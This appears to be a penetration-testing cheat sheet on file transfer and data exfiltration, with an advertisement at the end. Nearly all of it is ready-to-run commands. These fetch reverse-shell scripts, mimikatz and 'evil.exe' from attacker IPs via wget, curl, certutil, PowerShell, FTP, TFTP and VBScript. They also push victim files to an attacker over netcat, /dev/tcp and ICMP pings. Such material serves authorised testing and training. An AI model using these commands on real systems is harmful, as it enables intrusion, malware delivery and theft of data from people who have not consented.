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# Exfiltration
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***
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## Commonly whitelisted domains to exfiltrate information
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Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused
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## Copy\&Paste Base64
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**Linux**
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```bash
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base64 -w0 <file> #Encode file
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base64 -d file #Decode file
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```
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**Windows**
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```
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certutil -encode payload.dll payload.b64
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certutil -decode payload.b64 payload.dll
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```
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## HTTP
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**Linux**
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```bash
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wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
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wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
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curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
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fetch 10.10.14.14:8000/shell.py #FreeBSD
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```
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**Windows**
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```bash
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certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
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bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
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#PS
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(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
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Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
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wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
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Import-Module BitsTransfer
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Start-BitsTransfer -Source $url -Destination $output
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#OR
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Start-BitsTransfer -Source $url -Destination $output -Asynchronous
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```
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### Upload files
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* [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
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* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
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* Python module [uploadserver](https://pypi.org/project/uploadserver/):
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```bash
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# Listen to files
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python3 -m pip install --user uploadserver
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python3 -m uploadserver
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# With basic auth:
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# python3 -m uploadserver --basic-auth hello:world
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# Send a file
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curl -X POST http://HOST/upload -H -F 'files=@file.txt'
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# With basic auth:
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# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
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```
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### **HTTPS Server**
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```python
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# from https://gist.github.com/dergachev/7028596
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# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
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# generate server.xml with the following command:
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# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
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# run as follows:
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# python simple-https-server.py
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# then in your browser, visit:
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# https://localhost:443
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### PYTHON 2
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import BaseHTTPServer, SimpleHTTPServer
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import ssl
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httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
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httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
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httpd.serve_forever()
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###
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### PYTHON3
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from http.server import HTTPServer, BaseHTTPRequestHandler
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import ssl
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httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
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httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
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httpd.serve_forever()
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###
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### USING FLASK
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from flask import Flask, redirect, request
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from urllib.parse import quote
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app = Flask(__name__)
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@app.route('/')
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def root():
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print(request.get_json())
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return "OK"
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if __name__ == "__main__":
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app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
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###
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```
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## FTP
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### FTP server (python)
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```bash
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pip3 install pyftpdlib
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python3 -m pyftpdlib -p 21
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```
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### FTP server (NodeJS)
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```
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sudo npm install -g ftp-srv --save
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ftp-srv ftp://0.0.0.0:9876 --root /tmp
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```
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### FTP server (pure-ftp)
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```bash
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apt-get update && apt-get install pure-ftp
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```
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```bash
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#Run the following script to configure the FTP server
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#!/bin/bash
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groupadd ftpgroup
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useradd -g ftpgroup -d /dev/null -s /etc ftpuser
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pure-pwd useradd fusr -u ftpuser -d /ftphome
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pure-pw mkdb
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cd /etc/pure-ftpd/auth/
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ln -s ../conf/PureDB 60pdb
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mkdir -p /ftphome
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chown -R ftpuser:ftpgroup /ftphome/
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/etc/init.d/pure-ftpd restart
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```
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### **Windows** client
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```bash
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#Work well with python. With pure-ftp use fusr:ftp
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echo open 10.11.0.41 21 > ftp.txt
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echo USER anonymous >> ftp.txt
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echo anonymous >> ftp.txt
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echo bin >> ftp.txt
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echo GET mimikatz.exe >> ftp.txt
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echo bye >> ftp.txt
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ftp -n -v -s:ftp.txt
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```
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***
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## SMB
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Kali as server
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```bash
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kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
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kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
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#For new Win10 versions
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impacket-smbserver -smb2support -user test -password test test `pwd`
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```
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Or create a smb share **using samba**:
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```bash
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apt-get install samba
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mkdir /tmp/smb
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chmod 777 /tmp/smb
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#Add to the end of /etc/samba/smb.conf this:
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[public]
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comment = Samba on Ubuntu
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path = /tmp/smb
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read only = no
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browsable = yes
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guest ok = Yes
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#Start samba
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service smbd restart
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```
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Windows
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```bash
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CMD-Wind> \\10.10.14.14\path\to\exe
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CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
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WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
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WindPS-2> cd new_disk:
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```
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## SCP
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The attacker has to have SSHd running.
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```bash
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scp <username>@<Attacker_IP>:<directory>/<filename>
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```
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## SSHFS
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If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
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```bash
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sudo apt-get install sshfs
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sudo mkdir /mnt/sshfs
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sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
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```
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## NC
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```bash
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nc -lvnp 4444 > new_file
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nc -vn <IP> 4444 < exfil_file
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```
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## /dev/tcp
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### Download file from victim
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```bash
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nc -lvnp 80 > file #Inside attacker
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cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
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```
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### Upload file to victim
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```bash
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nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
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# Inside victim
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exec 6< /dev/tcp/10.10.10.10/4444
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cat <&6 > file.txt
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```
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thanks to **@BinaryShadow\_**
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## **ICMP**
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```bash
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# To exfiltrate the content of a file via pings you can do:
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xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
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#This will 4bytes per ping packet (you could probably increase this until 16)
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```
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```python
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from scapy.all import *
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#This is ippsec receiver created in the HTB machine Mischief
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def process_packet(pkt):
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if pkt.haslayer(ICMP):
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if pkt[ICMP].type == 0:
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data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
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print(f"{data.decode('utf-8')}", flush=True, end="")
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sniff(iface="tun0", prn=process_packet)
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```
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## **SMTP**
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If you can send data to an SMTP server, you can create an SMTP to receive the data with python:
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```bash
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sudo python -m smtpd -n -c DebuggingServer :25
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```
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## TFTP
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By default in XP and 2003 (in others it needs to be explicitly added during installation)
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In Kali, **start TFTP server**:
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```bash
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#I didn't get this options working and I prefer the python option
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mkdir /tftp
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atftpd --daemon --port 69 /tftp
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cp /path/tp/nc.exe /tftp
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```
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**TFTP server in python:**
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```bash
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pip install ptftpd
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ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
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```
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In **victim**, connect to the Kali server:
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```bash
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tftp -i <KALI-IP> get nc.exe
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```
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## PHP
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Download a file with a PHP oneliner:
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```bash
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echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
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```
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## VBScript
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```bash
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Attacker> python -m SimpleHTTPServer 80
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```
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**Victim**
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```bash
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echo strUrl = WScript.Arguments.Item(0) > wget.vbs
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echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
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echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
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echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
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echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
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echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
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echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
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echo Err.Clear >> wget.vbs
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echo Set http = Nothing >> wget.vbs
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echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
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echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
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echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
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echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
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echo http.Open "GET", strURL, False >> wget.vbs
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echo http.Send >> wget.vbs
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echo varByteArray = http.ResponseBody >> wget.vbs
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echo Set http = Nothing >> wget.vbs
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echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
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echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
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echo strData = "" >> wget.vbs
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echo strBuffer = "" >> wget.vbs
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echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
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echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
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echo Next >> wget.vbs
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echo ts.Close >> wget.vbs
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```
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```bash
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cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
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```
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## Debug.exe
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This is a crazy technique that works on Windows 32 bit machines. The idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
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`Debug.exe` can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
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```
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upx -9 nc.exe
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```
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Now it only weighs 29 kb. Perfect. So now let's disassemble it:
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```
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wine exe2bat.exe nc.exe nc.txt
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```
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Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
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## DNS
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* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
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<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
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Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
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